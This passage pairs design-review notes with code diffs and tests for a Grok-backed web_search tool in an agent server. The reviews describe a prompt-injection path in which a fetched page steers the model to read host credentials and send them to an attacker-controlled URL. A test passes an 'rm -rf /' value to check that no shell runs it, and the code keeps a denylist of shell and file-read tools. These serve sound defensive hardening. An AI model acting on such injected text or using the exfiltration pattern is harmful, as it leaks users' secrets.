§7.5's blanket ban — reconcile it), or (b) keep default/`dontAsk` and pass explicit `--allow` rules pre-approving `web_fetch` and the X tools (identify their exact permission prefixes/ids first). Add an acceptance criterion that a live X query actually returns X-sourced content (not a cancelled/empty result).
+
+2. **[Medium] MCP meta-tools bypass `--disallowed-tools`, so the "authoritative security boundary" (§7.1) is incomplete.** The headless docs state MCP meta-tools "remain available unless denied" and are "always-on" retained even with `--tools`/`--disallowed-tools` (14-headless §Tool Filtering). If the host Grok install has any MCP servers configured, their tools stay callable during a `web_search` run and are not covered by the spec's built-in-id denylist — and would be auto-approved if resolution 1(a) adopts `bypassPermissions`. Add a prerequisite that the host Grok config has no untrusted MCP servers (verify `~/.grok`), and/or add `--deny 'MCPTool(*)'`, and consider a `--sandbox` profile (14-headless line 44) for OS-level filesystem/network confinement as defense-in-depth.
+
+3. **[Low] Reconcile conditional vs unconditional denylist ids.** §7.1 says include media/mutation ids "if present in the install," but §7.2's concrete argv lists `image_gen,image_edit,image_to_video,reference_to_video` unconditionally. The docs don't state whether `--disallowed-tools` ignores unknown ids or errors. Confirm Grok tolerates denylisting absent tools (removing a non-present tool should be a no-op); if it can error, gate those ids dynamically or drop the ambiguity so an install lacking media tools doesn't fail the spawn.
+
+### 2026-07-19T18:10:37.443Z - Reviewer: claude-default
+
+Status: **changes-requested**
+
+All three findings from review-2 are resolved and I verified the mechanics against the installed Grok docs (`14-headless-mode.md`, `22-permissions-and-safety.md`, `18-sandbox.md`): `--permission-mode bypassPermissions` is a valid flag value and, crucially, **`deny` rules and hooks still apply under it** (22-permissions §Permission Modes) — so §7.1's reconciliation of "no yolo" with a hardened bypass is sound, and the `--deny 'MCPTool(*)'` belt-and-suspenders is real (`MCPTool` is a recognized deny prefix; `--deny` uses `ToolPrefix(glob)` syntax). The unconditional denylist constant (§7.1) and MCP deploy prerequisite (§7.6) are good. One new **high** security gap introduced by adopting `bypassPermissions`, plus one low:
+
+1. **[High] Lethal trifecta: local file reads + arbitrary `web_fetch` egress + untrusted fetched content enable secret exfiltration.** `read_file`, `list_dir`, and `grep` are on Grok's "never prompt / auto-approved in every mode" list (22-permissions §Operations That Never Prompt) — so they run regardless of permission mode and are **not** in the spec's denylist, which only removes write/shell/agent/media. Under §7.2's `bypassPermissions`, `web_fetch` is auto-approved and can fetch **any** URL/host (WebFetch rules glob the whole URL unless deny-restricted). §7.5 already declares returned text untrusted, i.e. the design acknowledges prompt-injection exposure from fetched web/X pages. That is the full lethal trifecta: an injected page can steer Grok to `read_file` a host secret (e.g. `~/.grok/auth.json`, `XAI_API_KEY` in env-derived files, `~/.assistant/data/config.json`) and exfiltrate it via a crafted `web_fetch('https://attacker/collect?d=<secret>')`. Note `--cwd <dataDir>/grok-web-search` does **not** confine reads — only an OS `--sandbox` profile does (18-sandbox uses Landlock/Seatbelt). Web/X research needs no local filesystem access, so the fix is cheap and lossless: (a) remove local read tools — add `read_file,list_dir,grep` to `--disallowed-tools` and/or `--deny 'Read(*)' 'Grep(*)'` (deny still applies under bypass); and/or (b) run under a network/filesystem-restricting `--sandbox` profile (e.g. `strict`/`read-only`, which also block child-process network on Linux) and/or constrain egress with `WebFetch(domain:...)` allow-listing. Add an acceptance criterion that Grok cannot read arbitrary host files during a web_search.
+
+2. **[Low] `bypassPermissions` can be locked off at the host, silently disabling web_fetch/X.** Per 22-permissions, an admin or user `requirements.toml` (or legacy `[ui] yolo = false`), at `~/.grok/requirements.toml` or root-owned `/etc/grok/requirements.toml`, can turn always-approve off so `--permission-mode bypassPermissions` won't enable it — and a catch-all managed `allow` is ignored when always-approve is locked. The entire X/fetch capability then silently degrades to `web_search`-only. Add to §7.6 deploy prerequisites: confirm the agent-server user's Grok config does not lock off `bypassPermissions`; and rely on the live X acceptance test (§9/§11) to catch a locked host. Optionally note the more robust alternative — default mode + explicit `--allow` rules for `WebFetch`/X — if the X tools' permission class can be pinned down (it is not enumerated among the recognized `Read/Edit/Grep/MCPTool/WebFetch/WebSearch` classes, which is why bypass was chosen).
+
+### 2026-07-19T18:14:33.526Z - Reviewer: claude-default
+
+Status: **changes-requested**
+
+Both review-3 findings are resolved: the denylist now removes `read_file,list_dir,grep` with a clear rationale (§7.1), and §7.6 documents the `bypassPermissions`-not-locked prerequisite. I re-verified the tool surface against the installed Grok docs and the mitigation holds where it counts: Grok's built-in read/search tool ids are exactly `read_file` / `list_dir` / `grep` (01-getting-started §Tools), and the hooks doc confirms `Glob` and `ListDir` both map to `list_dir` (10-hooks) — so there is **no separate `glob` id slipping past the denylist** — and `Agent` correctly blocks the `spawn_subagent` tool. The design is very close. Two **low** residuals remain, both about the one channel that is inherent to a web-research tool — `web_fetch`:
+
+1. **[Low] `web_fetch` is itself an unrestricted read/egress primitive; the "closes the exfil path" claim (§7.1) is contingent on its SSRF/scheme handling.** Denying `read_file`/`list_dir`/`grep` shuts the *file-tool* read leg, but `web_fetch` remains auto-approved under `bypassPermissions` and the docs are silent on whether it rejects non-`http(s)` schemes (`file://`) and blocks loopback/link-local/private targets (`127.0.0.1`, `169.254.169.254` metadata, internal admin endpoints). If it does not, an injected page can still read a local/internal secret **via `web_fetch` itself** and exfiltrate it — the read-tool denial does not cover that. Crucially, `--sandbox` does **not** help here: per 18-sandbox line 189, "web_search, web_fetch, and the LLM API always have network access," so `restrict_network` never constrains `web_fetch` egress (it only blocks child-process network like `curl`). The one sandbox lever that *would* help is a custom-profile kernel `deny` list over credential paths (18-sandbox line 36, e.g. `**/*.pem`, `~/.grok/auth.json`), which blocks even in-process `file://` reads. Recommendation: (a) qualify the §7.1 line-183 claim to "closes the *file-tool* read leg" rather than the whole exfil path; (b) require the implementer to verify Grok's `web_fetch` rejects `file://` and private/loopback/link-local hosts, and document the result as an accepted residual (open external egress is unavoidable for open web research); (c) correct §7.1's "optional later: OS sandbox profile" note to reflect that a sandbox constrains filesystem reads (custom `deny` list), not `web_fetch` egress.
+
+2. **[Low] `memory_search` remains reachable and is not needed for web/X research.** Grok's default set includes `memory_search` (cross-session memory; 01-getting-started §Tools), which is not in the denylist. During an untrusted-content run it is a minor additional read/exfil surface (prior-session memory for the agent-server user). Add `memory_search` to the denylist constant (and `todo_write` is harmless and may stay); web/X research does not need it. This is belt-and-suspenders, not a blocker.
+
+Everything else — wiring, allowlists, session keying, Realtime ≤20s/speakable timeout, shell-free argv, MCP deny + prerequisite, tests, and no `search_*` collision — is ready to implement. Folding in the two low items above (primarily the `web_fetch` SSRF verification + honest wording of the §7.1 claim) makes this clean.
+
+### 2026-07-19T18:19:46.787Z - Reviewer: claude-default
+
+Status: **clean**
+
+Both review-4 low findings are resolved. `memory_search` is now in the denylist constant (§7.1) and the §7.2 argv. The `web_fetch` residual is documented honestly (§7.1 "Residual (web_fetch)"): it frames read-tool denial as removing only "the local-read half of classic secret exfil," calls out the unproven SSRF surface (`file://`, loopback, link-local, RFC1918) as a one-time implementer verification, and explicitly states that `--sandbox` does not fully constrain `web_fetch` egress — no false sandbox claim remains, and the §7.1 line-183 wording is no longer overstated.
+
+The design is ready to implement. Summary of the full review arc, all verified against the codebase and the installed Grok docs (`14-headless-mode.md`, `22-permissions-and-safety.md`, `18-sandbox.md`, `01-getting-started.md`, `10-hooks.md`):
+
+- **Wiring/implementability:** built-in registration mirrors `voice_speak`/`attachment_send`; the built-in host is shared with Realtime; `ctx.sessionId` and `ctx.envConfig.dataDir` are available on both chat and Realtime paths; allowlists glob-match and Realtime is explicit opt-in.
+- **Security:** `shell: false` argv spawn, no query shell-interpolation; `bypassPermissions` reconciled with "no yolo" and safe only because deny rules still apply under bypass; denylist ids verified real (`run_terminal_cmd`, `Agent`→subagents, `search_replace`/`write`, `read_file`/`list_dir`/`grep` with `glob` subsumed by `list_dir`, `memory_search`, media); MCP deny + deploy prerequisite; `bypassPermissions`-not-locked prerequisite; untrusted-text handling; `web_fetch` egress residual honestly scoped with implementer verification.
+- **continue/session keying, Realtime timeouts, config enablement, tests, `search_*` non-collision:** all sound as specified.
+
+No blocking or non-blocking findings remain. Approved to proceed to implementation (Keel `iterative-review` will still cover the code).

--- a/packages/agent-server/data/config.example.json
+++ b/packages/agent-server/data/config.example.json
@@ -13,7 +13,8 @@
       "systemPrompt": "You are a lists manager. Help the user create and manage personal lists for any purpose - reading lists, shopping lists, movie watchlists, recipe collections, and more.\n\nYou can:\n- Create new lists with names, descriptions, and tags\n- Add items to lists (with optional URLs and notes)\n- Search across lists or within a specific list\n- Move items between lists\n- Update or delete lists and items\n\nWhen the user asks you to save a URL to a list, use the url_fetch_fetch tool with mode \"metadata\" to retrieve the page title before adding the item. If the fetch fails or returns no title, derive a title from the URL or ask the user what they'd like to call it.\n\nWhen displaying multiple items (from a list or search results), format them as a markdown table with minimal relevant columns (e.g., title and URL, or title and notes). Keep it concise.",
       "toolAllowlist": [
         "lists_*",
-        "url_fetch_fetch"
+        "url_fetch_fetch",
+        "web_search"
       ]
     },
     {
@@ -293,7 +294,8 @@
   "voice": {
     "realtime": {
       "toolAllowlist": [
-        "lists_*"
+        "lists_*",
+        "web_search"
       ]
     }
   }

--- a/packages/agent-server/src/builtInTools.ts
+++ b/packages/agent-server/src/builtInTools.ts
@@ -32,6 +32,7 @@ import {
   formatAttachmentTooLargeMessage,
 } from './attachments/constants';
 import { createNotificationRecord } from '../../plugins/core/notifications/server/service';
+import { createWebSearchToolDefinition } from './tools/webSearch';
 
 interface AgentMessageArgs {
   agentId: string;
@@ -1266,4 +1267,6 @@ export function registerBuiltInSessionTools(options: {
     handler: async (args, ctx) =>
       handleAttachmentSend(args, ctx, options.sessionHub, attachmentPreviewChars),
   });
+
+  options.host.registerTool(createWebSearchToolDefinition());
 }

--- a/packages/agent-server/src/tools/webSearch.test.ts
+++ b/packages/agent-server/src/tools/webSearch.test.ts
@@ -1,0 +1,281 @@
+import fs from 'node:fs/promises';
+import os from 'node:os';
+import path from 'node:path';
+
+import { afterEach, describe, expect, it } from 'vitest';
+
+import type { ToolContext } from './types';
+import { ToolError } from './errors';
+import {
+  buildGrokWebSearchArgs,
+  clearWebSearchSessionsForTests,
+  executeWebSearch,
+  getWebSearchSessionForTests,
+  GROK_WEB_SEARCH_DISALLOWED_TOOLS,
+  parseGrokJsonStdout,
+  parseWebSearchArgs,
+  resolveWebSearchWorkdir,
+  setGrokRunnerForTests,
+  WEB_SEARCH_TOOL_NAME,
+} from './webSearch';
+import { isRealtimeToolSessionId, VOICE_TOOL_SESSION_PREFIX } from '../voice/constants';
+
+function makeCtx(sessionId: string, dataDir?: string): ToolContext {
+  return {
+    sessionId,
+    signal: new AbortController().signal,
+    ...(dataDir
+      ? {
+          envConfig: {
+            dataDir,
+          } as ToolContext['envConfig'],
+        }
+      : {}),
+  } as ToolContext;
+}
+
+describe('webSearch helpers', () => {
+  afterEach(() => {
+    clearWebSearchSessionsForTests();
+    setGrokRunnerForTests(null);
+  });
+
+  it('exports the stable tool name', () => {
+    expect(WEB_SEARCH_TOOL_NAME).toBe('web_search');
+  });
+
+  it('detects Realtime session keys via shared prefix', () => {
+    expect(VOICE_TOOL_SESSION_PREFIX).toBe('voice:');
+    expect(isRealtimeToolSessionId('voice:abc')).toBe(true);
+    expect(isRealtimeToolSessionId('session-1')).toBe(false);
+  });
+
+  it('parses query and continue', () => {
+    expect(parseWebSearchArgs({ query: '  What is up?  ' })).toEqual({
+      query: 'What is up?',
+      continueSession: false,
+    });
+    expect(parseWebSearchArgs({ query: 'again', continue: true }).continueSession).toBe(true);
+    expect(() => parseWebSearchArgs({ query: '   ' })).toThrow(ToolError);
+  });
+
+  it('builds argv without shell interpolation and without restrictive --tools', () => {
+    const args = buildGrokWebSearchArgs({
+      query: 'weather in Austin; rm -rf /',
+      maxTurns: 6,
+      rules: 'be brief',
+      cwd: '/tmp/work',
+    });
+    expect(args[0]).toBe('-p');
+    expect(args[1]).toBe('weather in Austin; rm -rf /');
+    expect(args).toContain('--permission-mode');
+    expect(args).toContain('bypassPermissions');
+    expect(args).toContain('--disallowed-tools');
+    expect(args).toContain(GROK_WEB_SEARCH_DISALLOWED_TOOLS);
+    expect(GROK_WEB_SEARCH_DISALLOWED_TOOLS).toContain('run_terminal_cmd');
+    expect(GROK_WEB_SEARCH_DISALLOWED_TOOLS).toContain('read_file');
+    expect(GROK_WEB_SEARCH_DISALLOWED_TOOLS).toContain('memory_search');
+    expect(args).not.toContain('--tools');
+    expect(args).toContain('--deny');
+    expect(args).toContain('MCPTool(*)');
+    expect(args).toContain('--cwd');
+    expect(args).toContain('/tmp/work');
+  });
+
+  it('includes --resume when continuing', () => {
+    const args = buildGrokWebSearchArgs({
+      query: 'and tomorrow?',
+      resumeSessionId: 'sess-1',
+      maxTurns: 6,
+      rules: 'x',
+      cwd: '/tmp/w',
+    });
+    const idx = args.indexOf('--resume');
+    expect(idx).toBeGreaterThan(-1);
+    expect(args[idx + 1]).toBe('sess-1');
+  });
+
+  it('parses Grok JSON stdout including trailing noise and nested objects', () => {
+    const raw = 'noise\n{"text":"Hello","sessionId":"s1","usage":{"input_tokens":10}}\n';
+    expect(parseGrokJsonStdout(raw)).toEqual({ text: 'Hello', sessionId: 's1' });
+  });
+
+  it('resolves workdir under dataDir', () => {
+    expect(resolveWebSearchWorkdir('/var/data')).toBe('/var/data/grok-web-search');
+  });
+});
+
+describe('executeWebSearch', () => {
+  afterEach(() => {
+    clearWebSearchSessionsForTests();
+    setGrokRunnerForTests(null);
+  });
+
+  it('runs a new search and stores session id', async () => {
+    const captured: { args: string[]; timeoutMs: number } = { args: [], timeoutMs: 0 };
+    setGrokRunnerForTests(async (opts) => {
+      captured.args = opts.args;
+      captured.timeoutMs = opts.timeoutMs;
+      return {
+        exitCode: 0,
+        stdout: JSON.stringify({ text: 'Sunny and 75F', sessionId: 'grok-1' }),
+        stderr: '',
+        timedOut: false,
+      };
+    });
+
+    const result = await executeWebSearch(
+      { query: 'What is the weather in Austin today?' },
+      makeCtx('chat-session-1', '/tmp/assistant-test-data'),
+    );
+    expect(result).toEqual({ text: 'Sunny and 75F', continued: false });
+    expect(getWebSearchSessionForTests('chat-session-1')).toBe('grok-1');
+    expect(captured.args[1]).toBe('What is the weather in Austin today?');
+    expect(captured.timeoutMs).toBe(100_000);
+    expect(captured.args).not.toContain('--tools');
+  });
+
+  it('uses Realtime timeout and max-turns for voice session keys', async () => {
+    let timeoutMs = 0;
+    let args: string[] = [];
+    setGrokRunnerForTests(async (opts) => {
+      timeoutMs = opts.timeoutMs;
+      args = opts.args;
+      return {
+        exitCode: 0,
+        stdout: JSON.stringify({ text: 'ok', sessionId: 'g2' }),
+        stderr: '',
+        timedOut: false,
+      };
+    });
+    await executeWebSearch({ query: 'ping' }, makeCtx('voice:conv-1'));
+    expect(timeoutMs).toBe(18_000);
+    const mt = args.indexOf('--max-turns');
+    expect(args[mt + 1]).toBe('6');
+  });
+
+  it('uses text max-turns for non-voice sessions', async () => {
+    let args: string[] = [];
+    setGrokRunnerForTests(async (opts) => {
+      args = opts.args;
+      return {
+        exitCode: 0,
+        stdout: JSON.stringify({ text: 'ok', sessionId: 'g3' }),
+        stderr: '',
+        timedOut: false,
+      };
+    });
+    await executeWebSearch({ query: 'ping' }, makeCtx('chat-1'));
+    const mt = args.indexOf('--max-turns');
+    expect(args[mt + 1]).toBe('14');
+  });
+
+  it('rejects empty query through executeWebSearch', async () => {
+    await expect(executeWebSearch({ query: '  ' }, makeCtx('s'))).rejects.toMatchObject({
+      code: 'invalid_arguments',
+    });
+  });
+
+  it('maps abort to cancelled', async () => {
+    setGrokRunnerForTests(async () => ({
+      exitCode: 143,
+      stdout: '',
+      stderr: '',
+      timedOut: false,
+      aborted: true,
+    }));
+    await expect(executeWebSearch({ query: 'x' }, makeCtx('s'))).rejects.toMatchObject({
+      code: 'cancelled',
+    });
+  });
+
+  it('continues with --resume when continue is true', async () => {
+    setGrokRunnerForTests(async () => ({
+      exitCode: 0,
+      stdout: JSON.stringify({ text: 'first', sessionId: 'grok-cont' }),
+      stderr: '',
+      timedOut: false,
+    }));
+    await executeWebSearch({ query: 'first' }, makeCtx('s1'));
+
+    let args: string[] = [];
+    setGrokRunnerForTests(async (opts) => {
+      args = opts.args;
+      return {
+        exitCode: 0,
+        stdout: JSON.stringify({ text: 'second', sessionId: 'grok-cont' }),
+        stderr: '',
+        timedOut: false,
+      };
+    });
+    const result = await executeWebSearch({ query: 'and tomorrow?', continue: true }, makeCtx('s1'));
+    expect(result.continued).toBe(true);
+    expect(result.text).toBe('second');
+    expect(args).toContain('--resume');
+    expect(args).toContain('grok-cont');
+  });
+
+  it('errors when continue has no prior session', async () => {
+    await expect(
+      executeWebSearch({ query: 'again', continue: true }, makeCtx('empty')),
+    ).rejects.toMatchObject({ code: 'no_prior_search' });
+  });
+
+  it('maps timeout to speakable error', async () => {
+    setGrokRunnerForTests(async () => ({
+      exitCode: null,
+      stdout: '',
+      stderr: '',
+      timedOut: true,
+    }));
+    await expect(executeWebSearch({ query: 'slow' }, makeCtx('voice:x'))).rejects.toMatchObject({
+      code: 'timeout',
+      message: expect.stringMatching(/timed out/i),
+    });
+  });
+
+  it('maps non-zero exit to execution_failed', async () => {
+    setGrokRunnerForTests(async () => ({
+      exitCode: 1,
+      stdout: '',
+      stderr: 'auth missing',
+      timedOut: false,
+    }));
+    await expect(executeWebSearch({ query: 'x' }, makeCtx('s'))).rejects.toMatchObject({
+      code: 'execution_failed',
+    });
+  });
+
+  it('defaultGrokRunner spawns shell:false via a fake binary', async () => {
+    setGrokRunnerForTests(null);
+    const dir = await fs.mkdtemp(path.join(os.tmpdir(), 'fake-grok-'));
+    const bin = path.join(dir, 'fake-grok');
+    // argv-array only: print first -p value and exit 0 with JSON
+    await fs.writeFile(
+      bin,
+      `#!/usr/bin/env node
+const args = process.argv.slice(2);
+const p = args.indexOf('-p');
+const q = p >= 0 ? args[p + 1] : '';
+process.stdout.write(JSON.stringify({ text: 'echo:' + q, sessionId: 'fake-sess' }));
+`,
+      { mode: 0o755 },
+    );
+    const prev = process.env['ASSISTANT_GROK_BIN'];
+    process.env['ASSISTANT_GROK_BIN'] = bin;
+    try {
+      const result = await executeWebSearch(
+        { query: 'hello;world' },
+        makeCtx('fake-sess-key', dir),
+      );
+      expect(result.text).toBe('echo:hello;world');
+      expect(getWebSearchSessionForTests('fake-sess-key')).toBe('fake-sess');
+    } finally {
+      if (prev === undefined) {
+        delete process.env['ASSISTANT_GROK_BIN'];
+      } else {
+        process.env['ASSISTANT_GROK_BIN'] = prev;
+      }
+    }
+  });
+});

--- a/packages/agent-server/src/tools/webSearch.test.ts
+++ b/packages/agent-server/src/tools/webSearch.test.ts
@@ -149,7 +149,7 @@ describe('executeWebSearch', () => {
       };
     });
     await executeWebSearch({ query: 'ping' }, makeCtx('voice:conv-1'));
-    expect(timeoutMs).toBe(18_000);
+    expect(timeoutMs).toBe(100_000);
     const mt = args.indexOf('--max-turns');
     expect(args[mt + 1]).toBe('6');
   });

--- a/packages/agent-server/src/tools/webSearch.ts
+++ b/packages/agent-server/src/tools/webSearch.ts
@@ -1,0 +1,376 @@
+import { spawn } from 'node:child_process';
+import fs from 'node:fs/promises';
+import os from 'node:os';
+import path from 'node:path';
+
+import type { BuiltInToolDefinition, ToolContext } from './types';
+import { ToolError } from './errors';
+import { isRealtimeToolSessionId } from '../voice/constants';
+
+export const WEB_SEARCH_TOOL_NAME = 'web_search';
+
+/** Dangerous / out-of-scope Grok tools removed for research-only invocations. */
+export const GROK_WEB_SEARCH_DISALLOWED_TOOLS = [
+  'run_terminal_cmd',
+  'Agent',
+  'search_replace',
+  'write',
+  'read_file',
+  'list_dir',
+  'grep',
+  'memory_search',
+  'image_gen',
+  'image_edit',
+  'image_to_video',
+  'reference_to_video',
+].join(',');
+
+const REALTIME_TIMEOUT_MS = 18_000;
+const TEXT_TIMEOUT_MS = 100_000;
+const REALTIME_MAX_TURNS = 6;
+const TEXT_MAX_TURNS = 14;
+
+const FIXED_RULES =
+  'Use web_search and web_fetch for general web facts. ' +
+  'Use X tools for posts, accounts, and threads when the question is about X/Twitter. ' +
+  'Do not run shell commands or edit files. Prefer current information over stale knowledge.';
+
+const REALTIME_RULES =
+  `${FIXED_RULES} Answer for spoken voice in 1–3 sentences unless the user asked for detail.`;
+
+/** In-memory Grok session ids keyed by Assistant tool conversation key. */
+const grokSessionByConversation = new Map<string, string>();
+
+export function clearWebSearchSessionsForTests(): void {
+  grokSessionByConversation.clear();
+}
+
+export function getWebSearchSessionForTests(conversationKey: string): string | undefined {
+  return grokSessionByConversation.get(conversationKey);
+}
+
+export type GrokRunnerResult = {
+  exitCode: number | null;
+  stdout: string;
+  stderr: string;
+  timedOut: boolean;
+  aborted?: boolean;
+};
+
+export type GrokRunner = (options: {
+  bin: string;
+  args: string[];
+  cwd: string;
+  timeoutMs: number;
+  signal?: AbortSignal;
+}) => Promise<GrokRunnerResult>;
+
+let grokRunner: GrokRunner = defaultGrokRunner;
+
+export function setGrokRunnerForTests(runner: GrokRunner | null): void {
+  grokRunner = runner ?? defaultGrokRunner;
+}
+
+export function resolveGrokBin(): string {
+  const fromEnv = process.env['ASSISTANT_GROK_BIN']?.trim();
+  return fromEnv && fromEnv.length > 0 ? fromEnv : 'grok';
+}
+
+export function resolveWebSearchWorkdir(dataDir: string | undefined): string {
+  if (dataDir && dataDir.trim().length > 0) {
+    return path.join(dataDir.trim(), 'grok-web-search');
+  }
+  return path.join(os.tmpdir(), 'assistant-grok-web-search');
+}
+
+export function buildGrokWebSearchArgs(options: {
+  query: string;
+  resumeSessionId?: string;
+  maxTurns: number;
+  rules: string;
+  cwd: string;
+}): string[] {
+  const args = [
+    '-p',
+    options.query,
+    '--permission-mode',
+    'bypassPermissions',
+    '--disallowed-tools',
+    GROK_WEB_SEARCH_DISALLOWED_TOOLS,
+    '--deny',
+    'MCPTool(*)',
+    '--output-format',
+    'json',
+    '--cwd',
+    options.cwd,
+    '--max-turns',
+    String(options.maxTurns),
+    '--rules',
+    options.rules,
+  ];
+  if (options.resumeSessionId) {
+    args.push('--resume', options.resumeSessionId);
+  }
+  return args;
+}
+
+export function parseWebSearchArgs(raw: unknown): { query: string; continueSession: boolean } {
+  if (!raw || typeof raw !== 'object' || Array.isArray(raw)) {
+    throw new ToolError('invalid_arguments', 'Arguments must be an object');
+  }
+  const record = raw as Record<string, unknown>;
+  const queryRaw = record['query'];
+  if (typeof queryRaw !== 'string' || queryRaw.trim().length === 0) {
+    throw new ToolError('invalid_arguments', 'query is required and must be a non-empty string');
+  }
+  const continueSession = record['continue'] === true;
+  return { query: queryRaw.trim(), continueSession };
+}
+
+export function parseGrokJsonStdout(stdout: string): { text: string; sessionId?: string } {
+  const trimmed = stdout.trim();
+  if (!trimmed) {
+    throw new ToolError('execution_failed', 'Grok returned empty output');
+  }
+  // Headless may print non-JSON lines before the final JSON object; prefer the last
+  // full line that parses as JSON (nested objects break lastIndexOf('{') fallbacks).
+  let parsed: unknown;
+  try {
+    parsed = JSON.parse(trimmed);
+  } catch {
+    const lines = trimmed.split(/\r?\n/).map((line) => line.trim()).filter(Boolean);
+    let found: unknown;
+    for (let i = lines.length - 1; i >= 0; i -= 1) {
+      const line = lines[i]!;
+      if (!line.startsWith('{')) {
+        continue;
+      }
+      try {
+        found = JSON.parse(line);
+        break;
+      } catch {
+        // try previous line
+      }
+    }
+    if (found === undefined) {
+      throw new ToolError('execution_failed', 'Grok returned non-JSON output');
+    }
+    parsed = found;
+  }
+  if (!parsed || typeof parsed !== 'object' || Array.isArray(parsed)) {
+    throw new ToolError('execution_failed', 'Grok JSON result was not an object');
+  }
+  const obj = parsed as Record<string, unknown>;
+  const text = typeof obj['text'] === 'string' ? obj['text'].trim() : '';
+  if (!text) {
+    throw new ToolError('execution_failed', 'Grok returned no answer text');
+  }
+  const sessionId =
+    typeof obj['sessionId'] === 'string' && obj['sessionId'].trim().length > 0
+      ? obj['sessionId'].trim()
+      : undefined;
+  return sessionId ? { text, sessionId } : { text };
+}
+
+async function defaultGrokRunner(options: {
+  bin: string;
+  args: string[];
+  cwd: string;
+  timeoutMs: number;
+  signal?: AbortSignal;
+}): Promise<GrokRunnerResult> {
+  if (options.signal?.aborted) {
+    throw new ToolError('cancelled', 'Web search was cancelled');
+  }
+
+  await fs.mkdir(options.cwd, { recursive: true });
+
+  return await new Promise<GrokRunnerResult>((resolve, reject) => {
+    let stdout = '';
+    let stderr = '';
+    let timedOut = false;
+    let aborted = false;
+    let settled = false;
+
+    const child = spawn(options.bin, options.args, {
+      shell: false,
+      cwd: options.cwd,
+      env: process.env,
+      stdio: ['ignore', 'pipe', 'pipe'],
+    });
+
+    const escalateKill = () => {
+      setTimeout(() => {
+        if (!settled) {
+          child.kill('SIGKILL');
+        }
+      }, 2_000).unref?.();
+    };
+
+    const timer = setTimeout(() => {
+      timedOut = true;
+      child.kill('SIGTERM');
+      escalateKill();
+    }, options.timeoutMs);
+
+    const onAbort = () => {
+      aborted = true;
+      child.kill('SIGTERM');
+      escalateKill();
+    };
+    options.signal?.addEventListener('abort', onAbort, { once: true });
+
+    child.stdout?.setEncoding('utf8');
+    child.stderr?.setEncoding('utf8');
+    child.stdout?.on('data', (chunk: string) => {
+      stdout += chunk;
+      if (stdout.length > 2_000_000) {
+        stdout = stdout.slice(-1_500_000);
+      }
+    });
+    child.stderr?.on('data', (chunk: string) => {
+      stderr += chunk;
+      if (stderr.length > 500_000) {
+        stderr = stderr.slice(-400_000);
+      }
+    });
+
+    child.on('error', (error) => {
+      if (settled) {
+        return;
+      }
+      settled = true;
+      clearTimeout(timer);
+      options.signal?.removeEventListener('abort', onAbort);
+      reject(
+        new ToolError(
+          'execution_failed',
+          `Failed to start Grok (${options.bin}): ${error.message}`,
+        ),
+      );
+    });
+
+    child.on('close', (code) => {
+      if (settled) {
+        return;
+      }
+      settled = true;
+      clearTimeout(timer);
+      options.signal?.removeEventListener('abort', onAbort);
+      resolve({
+        exitCode: code,
+        stdout,
+        stderr,
+        timedOut,
+        aborted,
+      });
+    });
+  });
+}
+
+export async function executeWebSearch(
+  args: unknown,
+  ctx: ToolContext,
+): Promise<{ text: string; continued: boolean }> {
+  const { query, continueSession } = parseWebSearchArgs(args);
+  const conversationKey = ctx.sessionId?.trim();
+  if (!conversationKey) {
+    throw new ToolError('session_unavailable', 'Current session is not available');
+  }
+
+  const realtime = isRealtimeToolSessionId(conversationKey);
+  const timeoutMs = realtime ? REALTIME_TIMEOUT_MS : TEXT_TIMEOUT_MS;
+  const maxTurns = realtime ? REALTIME_MAX_TURNS : TEXT_MAX_TURNS;
+  const rules = realtime ? REALTIME_RULES : FIXED_RULES;
+
+  let resumeSessionId: string | undefined;
+  if (continueSession) {
+    resumeSessionId = grokSessionByConversation.get(conversationKey);
+    if (!resumeSessionId) {
+      throw new ToolError(
+        'no_prior_search',
+        'No previous web search in this conversation. Call web_search without continue first.',
+      );
+    }
+  }
+
+  const workdir = resolveWebSearchWorkdir(ctx.envConfig?.dataDir);
+  const argsList = buildGrokWebSearchArgs({
+    query,
+    ...(resumeSessionId ? { resumeSessionId } : {}),
+    maxTurns,
+    rules,
+    cwd: workdir,
+  });
+
+  const result = await grokRunner({
+    bin: resolveGrokBin(),
+    args: argsList,
+    cwd: workdir,
+    timeoutMs,
+    ...(ctx.signal ? { signal: ctx.signal } : {}),
+  });
+
+  if (result.aborted || ctx.signal?.aborted) {
+    throw new ToolError('cancelled', 'Web search was cancelled');
+  }
+
+  if (result.timedOut) {
+    throw new ToolError(
+      'timeout',
+      realtime
+        ? 'Research timed out. Try a shorter question.'
+        : 'Research timed out before Grok finished.',
+    );
+  }
+
+  if (result.exitCode !== 0) {
+    const detail = result.stderr.trim().slice(0, 200);
+    throw new ToolError(
+      'execution_failed',
+      detail
+        ? `Grok research failed: ${detail}`
+        : 'Grok research failed. Check host Grok auth and configuration.',
+    );
+  }
+
+  const parsed = parseGrokJsonStdout(result.stdout);
+  if (parsed.sessionId) {
+    grokSessionByConversation.set(conversationKey, parsed.sessionId);
+  }
+
+  return {
+    text: parsed.text,
+    continued: continueSession,
+  };
+}
+
+export function createWebSearchToolDefinition(): BuiltInToolDefinition {
+  return {
+    name: WEB_SEARCH_TOOL_NAME,
+    description:
+      'Search the live public web and public X/Twitter for current information. ' +
+      'Pass query as a full natural-language question or request ' +
+      '(e.g. "What is the weather in Austin today?" or "What has @user posted recently about robots?"). ' +
+      'Do not pass bare keyword lists. ' +
+      'Set continue to true only when following up on the previous search in this conversation.',
+    parameters: {
+      type: 'object',
+      properties: {
+        query: {
+          type: 'string',
+          description:
+            'Natural-language research question or request (not a bare keyword list).',
+        },
+        continue: {
+          type: 'boolean',
+          description:
+            'When true, resume the previous Grok research session for this conversation. Default false.',
+        },
+      },
+      required: ['query'],
+      additionalProperties: false,
+    },
+    handler: async (args, ctx) => executeWebSearch(args, ctx),
+  };
+}

--- a/packages/agent-server/src/tools/webSearch.ts
+++ b/packages/agent-server/src/tools/webSearch.ts
@@ -25,8 +25,10 @@ export const GROK_WEB_SEARCH_DISALLOWED_TOOLS = [
   'reference_to_video',
 ].join(',');
 
-const REALTIME_TIMEOUT_MS = 18_000;
+// Realtime does not block spoken turns while tools run, so use the same wall-clock
+// budget as text agents. (Earlier design assumed synchronous dead air; that was wrong.)
 const TEXT_TIMEOUT_MS = 100_000;
+const REALTIME_TIMEOUT_MS = TEXT_TIMEOUT_MS;
 const REALTIME_MAX_TURNS = 6;
 const TEXT_MAX_TURNS = 14;
 

--- a/packages/agent-server/src/voice/constants.ts
+++ b/packages/agent-server/src/voice/constants.ts
@@ -1,0 +1,16 @@
+/**
+ * Prefix for ToolContext.sessionId values used by Realtime voice tool execution.
